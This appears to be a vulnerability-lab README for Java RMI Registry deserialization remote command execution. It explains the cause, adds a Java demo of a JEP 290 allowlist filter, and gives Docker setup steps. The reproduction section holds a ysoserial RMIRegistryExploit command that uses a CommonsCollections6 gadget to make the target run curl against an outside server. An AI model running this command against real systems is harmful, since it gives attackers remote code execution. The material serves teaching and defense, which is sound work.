Aaron 63285f61aa
first commit
2025-09-06 16:08:15 +08:00
# Java ≤JDK 8u111 RMI Registry Deserialization Command Execution
Java Remote Method Invocation (RMI) is Java's mechanism for remote procedure calls. Although remote binding is normally disabled, the RMI Registry exposes a remote bind operation that can be abused. During the bind call, an attacker can send forged serialized data describing an object that implements the `Remote` interface (or a dynamic proxy implementing `Remote`), so that when the Registry deserializes the data it triggers the corresponding gadget chain. This environment uses commons-collections:3.2.1 for the demonstration.
References:
- <https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server>
- <https://github.com/frohoff/ysoserial>
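The root cause described above is that the Registry calls `readObject()` on attacker-supplied bytes with no restriction on which classes may be instantiated. The mitigation that later JDK builds ship is a JEP 290 deserialization filter (JDK 8u121 introduced the `sun.rmi.registry.registryFilter` allowlist for exactly this endpoint). The following is an added example, not Vulhub's code, showing how such a filter rejects an unlisted class before any of its `readObject` logic runs. It uses the `java.io.ObjectInputFilter` API, so it needs JDK 9 or newer; the allowlist pattern is an assumption written for the demo and is not the JDK's actual registry filter, and `NotOnAllowlist` is a constructed stand-in, not a real gadget.

```java
// Added example (not part of the Vulhub environment): JEP 290 filter demo.
// Requires JDK 9+ for java.io.ObjectInputFilter.
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;

public class RegistryFilterDemo {

    // Allowlist shaped like a registry filter: only the types a bind() call
    // legitimately carries, and "!*" rejects every other class. This list is
    // an assumption for the demo, not the JDK's real sun.rmi.registry.registryFilter.
    static final ObjectInputFilter REGISTRY_FILTER = ObjectInputFilter.Config.createFilter(
            "java.lang.String;java.lang.Number;"
            + "java.rmi.Remote;java.rmi.server.RemoteObject;java.rmi.server.RemoteRef;"
            + "java.rmi.server.UID;java.rmi.server.ObjID;"
            + "maxdepth=20;!*");

    // Constructed stand-in for a gadget payload: any Serializable class that is
    // not on the allowlist. It carries no dangerous logic.
    static class NotOnAllowlist implements Serializable {
        private static final long serialVersionUID = 1L;
        String note = "constructed demo object";
    }

    static byte[] serialize(Object o) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Deserialize with the filter installed. Returns the object if every class
    // in the stream is allowed, or null if the filter rejected the stream.
    static Object deserializeFiltered(byte[] data) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(REGISTRY_FILTER);
            return ois.readObject();
        } catch (InvalidClassException rejected) {
            // The filter reports REJECTED as an InvalidClassException; the class
            // is never instantiated, so no readObject() gadget code runs.
            System.out.println("filter rejected: " + rejected.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // A bind name is a plain String and passes the allowlist.
        System.out.println("string  -> " + deserializeFiltered(serialize("hello")));
        // java.util.HashMap (a container the CommonsCollections chains are wrapped
        // in) is not listed, so the stream is rejected at the class descriptor.
        System.out.println("hashmap -> " + deserializeFiltered(serialize(new HashMap<String, String>())));
        // The constructed stand-in is rejected the same way.
        System.out.println("gadget  -> " + deserializeFiltered(serialize(new NotOnAllowlist())));
    }
}
```

Run with `javac RegistryFilterDemo.java && java RegistryFilterDemo`: the String case prints `hello`, the other two print a `filter status: REJECTED` message and `null`. The same effect on a real Registry comes from running a JDK at or above 8u121, where the built-in filter is applied to the Registry's incoming calls, optionally tightened further through the `sun.rmi.registry.registryFilter` system property.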
## Environment Setup
Run the following commands to build and start the RMI Registry and server:
```bash
docker compose build
docker compose run -e RMIIP=your-ip -p 1099:1099 rmi
```
Replace `your-ip` with the IP address of your server; the client will use this IP to connect to it.
Once the environment is up, the RMI Registry listens on port 1099.
## Vulnerability Reproduction
Use `RMIRegistryExploit` from ysoserial's exploit package to attack:
```bash
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"
```
![](1.png)
The Registry will return an error; this is expected, and the command is still executed.